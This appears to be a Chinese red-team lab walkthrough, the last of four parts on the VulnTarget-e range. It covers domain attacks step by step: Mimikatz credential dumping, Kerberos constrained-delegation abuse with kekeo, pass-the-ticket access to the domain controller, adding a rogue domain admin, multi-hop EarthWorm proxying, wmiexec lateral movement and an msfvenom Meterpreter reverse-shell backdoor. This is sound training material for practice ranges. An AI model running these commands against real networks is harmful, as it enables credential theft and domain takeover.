红蓝对抗靶场之内网渗透【四】完结撒花!
2023-6-12 08:2:50 Author: 李白你好(查看原文) 阅读量:27 收藏

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!

0x01 前言

红蓝对抗靶场前三篇VulnTarget-e边界主机权限获取【一】红蓝对抗靶场VulnTarget-e之内网渗透【二】红蓝对抗靶场之内网渗透【三】
此篇是最后一篇,内网渗透域内打法。看完文章兄弟们点点赞哈,最近要被文章阅读搞死了
涉及知识点
三级代理约束性委派攻击横向移动

0x02 信息收集

步骤一:开始进行信息收集,上传猕猴桃到Wins08执行抓取到域用户明文密码...

ping vulntarget.com   //10.0.10.10

定位域控

meterpreter > run post/windows/gather/enum_domain

MSF添加路由

use post/multi/manage/autorouteset session 3run

MSF抓取密码

load kiwikiwi_cmd sekurlsa::logonpasswords

Mimikatz

privilege::debug  //提升权限sekurlsa::logonpasswords  //抓取明文密码Domain user:win2008Domain user password:qweASD123

步骤二:上传Adfind程序判断存在非与约束性委派属性的并发现第三台主机上的win2008域账户对第四台主机10.10的CIFS服务存在约束委派...

查询域中配置非约束委派的主机

AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

查询域中配置非约束委派的服务账户

AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

茶渣

AdFind.exe -h 10.0.10.10 -u win2008 -up qweASD123  -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

0x03 约束性委派攻击

骤三:上传kekeo并用请求win2008的TGT接着伪造S4U请求,以administrator用户权限访问受委派的CIFS服务。

请求约束性委派用户的TGT

tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi

伪造S4U请求并访问CIFS服务

tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/WIN-1PV25H8UJPN.vulntarget.com

步骤四:利用mimikatz导入S4U2proxy阶段生成的ST并访问域控10.10主机(注意:导入一次ST执行一次命令)
导入ST
privilege::debugkerberos::ptt TGS_Administrator@vulntarget.com@VULNTARGET.COM_cifs~WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.kirbiexit
执行命令
dir \\WIN-1PV25H8UJPN.vulntarget.com\C$

步骤五:执行以下命令创建域用户并将其添加到域管理员中,查看用户信息...

net user 4pts 123[email protected] /add /domainnet group "domain admins" 4pts /add /domainnet group "domain admins" /domain

0x04 三级代理

步骤六:这里为了访问到内网域控主机需要挂三级代理...并按照以下操作设置...

边界主机(一层)

外网主机3777端口接收来自攻击机流量,7779接收来自3777端口流量

ew.exe -s lcx_listen -l 3777 -e 7779 -t 1000000

Ubuntu主机(二层)

Ubuntu的7779端口获取外网主机7779端口的流量,3999端口接收7779端口的流量

./ew -s lcx_slave -d 192.168.100.155 -e 7779 -f 192.168.88.102 -g 3999 -t 1000000

Wins08R2主机(三层)

第三台主机代理了来自3999端口的流量

ew.exe -s ssocksd -l 3999 -t 1000000

0x05 横向移动

步骤七:使用Impacket 中提供的wmiexec.py工具远程执行,成功上线第四台主机!!!

proxychains python3 wmiexec.py 4pts:123admiN@@10.0.10.10

步骤八:生成反向马并上传之Wins08R2,使用以下项目开启HTTP服务并通过PowerShell下载执行

开启监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.0.10.9set lport 5555run

生成后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.10.9 LPORT=5555 -f exe > inside.exe

上传执行

lput iinside.exe C:\iinside.exe

步骤九:至此结束,展示下全部靶机合照...


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247499158&idx=1&sn=330af38cbe90606c4c20f8c28719eb52&chksm=c09a8ec6f7ed07d0b690657d7d5027784652289553e5e4a57bd546f6c6e9798355c34ad9e883#rd
如有侵权请联系:admin#unsafe.sh